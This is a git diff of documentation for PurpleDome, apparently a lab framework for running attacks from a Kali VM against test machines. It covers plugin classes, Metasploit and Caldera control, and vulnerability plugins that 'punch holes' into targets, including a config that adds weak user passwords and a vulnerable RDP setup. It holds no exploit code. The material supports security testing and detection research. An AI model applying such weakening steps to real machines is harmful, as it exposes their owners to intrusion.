This class processes the plugin specific configuration. The *config* parameter will contain the plugin specific part of the yaml config file. You job will be to parse it, offer sane defaults and store the parsed config in *self.conf[]*.
Method: command
---------------
Creates a command that can be run on the kali machine as command. Parameters and configs you can use:
* targets: a list of ip addresses of potential targets
* config: special config for this call
* self.sysconf: global plugin configuration. Like the path to the kali share (internal or external)
* self.conf: The configuration you created in the *process_config* method
Method: run Method: run
----------- -----------
This will run the command line created by the method *command* on the kali attacker. This will run the attack.
Configuration
-------------
If you are using the plugin, you **must** have a config section for this kali plugin in the configuration. Even if it is empty. * targets: a list of target machines. If you need the network address, use target[0].get_ip()
The plugin class The plugin class
================ ================

@ -2,7 +2,7 @@
Extending the documentation Extending the documentation
=========================== ===========================
Tools being used are: Tools being used for documentation are:
* Argparse for my command line tools * Argparse for my command line tools
@ -20,3 +20,7 @@ Tools being used are:
* Autoyaml * Autoyaml
- https://github.com/Jakski/sphinxcontrib-autoyaml - https://github.com/Jakski/sphinxcontrib-autoyaml
* Asciinema
- https://pypi.org/project/sphinxcontrib.asciinema/

@ -8,13 +8,13 @@ Modules
Several core module create the system. Several core module create the system.
* CalderaControl: remote control for Caldera using the Caldera REST API * CalderaControl: remote control for Caldera using the Caldera REST API
* Metasploit: Metasploit control
* MachineControl: Create/start and stop VMs * MachineControl: Create/start and stop VMs
* ExperimentControl: Control experiments. Will internally use the modules already mentioned * ExperimentControl: Control experiments. Will internally use the modules already mentioned
* PluginManager: Plugin manager tasks
* MachineConfig / ExperimentConfig: Reading and processing configuration files
* AttackLog: Logging attack steps and output to stdio
.. sidebar:: Plugins
There will be a plugin system soon. Until then the only way to extend
PurpleDome is to modify the core source code. If it is not urgent, maybe better be patient and ask for a specific plugin interface.
-------------- --------------
CalderaControl CalderaControl
@ -25,6 +25,24 @@ Class for Caldera communication
.. autoclass:: app.calderacontrol.CalderaControl .. autoclass:: app.calderacontrol.CalderaControl
:members: :members:
----------
MetaSploit
----------
Class for Metasploit automation
.. autoclass:: app.metasploit.Metasploit
:members:
--------
MSFVenom
--------
Class for MSFVenom automation
.. autoclass:: app.metasploit.MSFVenom
:members:
-------------- --------------
MachineControl MachineControl
-------------- --------------
@ -54,3 +72,21 @@ Internal configuration handling. Currently there are two classes. One for the wh
.. autoclass:: app.config.MachineConfig .. autoclass:: app.config.MachineConfig
:members: :members:
-------------
PluginManager
-------------
Managing plugins
.. autoclass:: app.pluginmanager.PluginManager
:members:
---------
AttackLog
---------
Attack specific logging
.. autoclass:: app.attack_log.AttackLog
:members:

@ -9,19 +9,13 @@ Usage
To create a new plugin, start a sub-folder in plugins. The python file in there must contain a class that inherits from *SensorPlugin*. To create a new plugin, start a sub-folder in plugins. The python file in there must contain a class that inherits from *SensorPlugin*.
If the plugin is activated for a specific machine four specific methods will be called to interact with the target: If the plugin is activated for a specific machine specific methods will be called to interact with the target:
* Install * prime: Easrly installation steps, can trigger a reboot of the machine by returning True
* Start * install: Normal, simple installation. No reboot
* Stop * start: Start the sensor
* Collect results * stop: Stop the sensor
* collect: Collect results
Methods for these four are called by PurpleDome. Normally you should not have to edit these methods. Just the commands you that are called by them. And those commands are created by specific methods:
* install_command
* start_command
* stop_command
* collect_command
Boilerplate Boilerplate
----------- -----------

@ -8,8 +8,11 @@ A VM plugin handles several things:
* vm creation/destruction * vm creation/destruction
* vm starting/stopping * vm starting/stopping
* connecting to the VM (ssh or similar) and running commands there
* Copy files from and to the VM VM controller plugins can use SSH as a mixin class. This is implemented in *ssh_features.py* and reduces code duplication. In certain cases (for example if SSH needs some extra features) you can extend or replace methods from there. SSH handles:
* connecting to the VM and running commands there
* Copying files from and to the VM
@ -29,68 +32,28 @@ The boilerplate contains some basics:
* description. A human readable description for this plugin. * description. A human readable description for this plugin.
* required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init.
Method: process_config Some relevant methods are
----------------------
The configuration for this machine is a sub-section in the experiment config. As the different machinery systems might require special handling, you can parse the config in this section and add your own processing or defaults
Method: create process_config
-------------- --------------
Creates the machine (for systems like vagrant that build a machine out of a config file) The configuration for this machine is a sub-section in the experiment config. As the different machinery systems might require special handling, you can parse the config in this section and add your own processing or defaults
Method: up
----------
Starts the machine
Method: halt
------------
Stops the machine
Method: destroy
---------------
Remove the machine from disk. Only smart if you can re-create it with *create*
Method: connect
---------------
Create a connection to this machine to run shell commands or copy files
Method: remote_run
------------------
Execute a command on the running machine
Method: put
-----------
Copy a file to the machine
Method: get
-----------
Get a file from the machine
Method: disconnect
------------------
Disconnect the command channel from the vm
Method: get_state get_state
----------------- ---------
Get the machines state. The class MachineStates contains potential return values Get the machines state. The class MachineStates contains potential return values
Method: get_ip get_ip
-------------- ------
Get the ip of the machine. If the machine is registered at the system resolver (/etc/hosts, dns, ...) a machine name would also be a valid response. As long as the network layer can reach it, everything is fine. Get the ip of the machine. If the machine is registered at the system resolver (/etc/hosts, dns, ...) a machine name would also be a valid response. As long as the network layer can reach it, everything is fine.
The plugin class The plugin class
================ ================
The machine class can also be very essential if you write attack plugins. Those have access to the kali attack and one or more targets. And those are Machinery objects.
For a full list of methods read on:
.. autoclass:: plugins.base.machinery.MachineryPlugin .. autoclass:: plugins.base.machinery.MachineryPlugin
:members: :members:

@ -2,9 +2,9 @@
Vulnerability plugins Vulnerability plugins
********************* *********************
To leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added. The configuration should be a mess. To leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added to the system. You get the idea.
This plugin type allows you to punch some holes into the protection of a machine. Which plugins are loaded for a specific target is defined in the configuration file. This plugin type allows you to punch some holes into the protection of a machine. Which vulnerability plugins are loaded for a specific target is defined in the configuration file. Feel free to weaken the defenses.
Usage Usage
===== =====
@ -20,25 +20,25 @@ The boilerplate contains some basics:
* name: a unique name, also used in the config yaml file to reference this plugin * name: a unique name, also used in the config yaml file to reference this plugin
* description: A human readable description for this plugin. * description: A human readable description for this plugin.
* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ Just as a hint which TTP this vulnerability could be realted to * ttp: The TTP number of this kali attack. See https://attack.mitre.org/ Just as a hint which TTP this vulnerability could be related to
* references. A list of urls to blog posts or similar describing the attack * references: A list of urls to blog posts or similar describing the attack
* required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init.
Method: install (optional)
--------------------------
*start* installs the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here.
Method: start Method: start
------------- -------------
Put the code in here that adds vulnerabilities to the machine. The most important method you can use here is "self.run_cmd" and execute a shell command. Adds the vulnerability to the machine. The most important method you can use here is "self.run_cmd" and execute a shell command.
Method: stop Method: stop
------------ ------------
Undo the changes after the attacks ran. If the machine is re-used (and not re-built or run from a snapshot) this will make it simpler for the user to run more experiments on slightly modified systems. Undo the changes after the attacks ran. If the machine is re-used (and not re-built or run from a snapshot) this will make it simpler for the user to run more experiments on slightly modified systems.
Method: install (optional)
--------------------------
*start* installs the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here.
The plugin class The plugin class
================ ================

@ -17,14 +17,12 @@ Welcome to the Purple Dome documentation!
basics/background basics/background
usage/cli
basics/configuration basics/configuration
basics/windows_targets basics/windows_targets
usage/usage
usage/cli
extending/vulnerability_plugins extending/vulnerability_plugins
extending/attack_plugins extending/attack_plugins

@ -19,22 +19,33 @@ Experiment control is the core tool to run an experiment. It accepts a yaml conf
:func: create_parser :func: create_parser
:prog: ./experiment_control.py :prog: ./experiment_control.py
Machine control Plugin manager
=============== ==============
Directly control the machines List available plugins or a specific plugin config
.. argparse:: .. argparse::
:filename: ../machine_control.py :filename: ../plugin_manager.py
:func: create_parser :func: create_parser
:prog: ./machine_control.py :prog: ./plugin_manager.py
Caldera control Caldera control
=============== ===============
Directly control a caldera server Directly control a caldera server. You will need a running caldera server to connect to. This plugin is handy to list available attacks and find the attack IDs matching specific TTP-IDs.
.. argparse:: .. argparse::
:filename: ../caldera_control.py :filename: ../caldera_control.py
:func: create_parser :func: create_parser
:prog: ./caldera_control.py :prog: ./caldera_control.py
Machine control
===============
Directly control the machines
.. argparse::
:filename: ../machine_control.py
:func: create_parser
:prog: ./machine_control.py

@ -89,14 +89,17 @@ targets:
vm_name: target2 vm_name: target2
os: windows os: windows
paw: target2w paw: target2w
### ###
# Targets need to be in a group for caldera. The group is more relevant than the paw. Better put every target in a unique group # Targets need to be in a group for caldera. The group is more relevant than the paw. Better put every target in a unique group
group: red group: red_windows
machinepath: target2w machinepath: target2w
###
# Do not destroy/create the machine: Set this to "yes". # Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes use_existing_machine: yes
### ###
# Optional setting to activate force when halting the machine. Windows guests sometime get stuck # Optional setting to activate force when halting the machine. Windows guests sometime get stuck
halt_needs_force: yes halt_needs_force: yes
@ -118,10 +121,13 @@ targets:
# Windows can only use default playground at the moment ! # Windows can only use default playground at the moment !
# playground: C:\\Users\\PurpleDome # playground: C:\\Users\\PurpleDome
###
# Sensors to run on this machine # Sensors to run on this machine
sensors: sensors:
- windows_idp - windows_idp
###
# Vulnerabilities to pre-install
vulnerabilities: vulnerabilities:
- weak_user_passwords - weak_user_passwords
- rdp_config_vul - rdp_config_vul

Loading…
Cancel
Save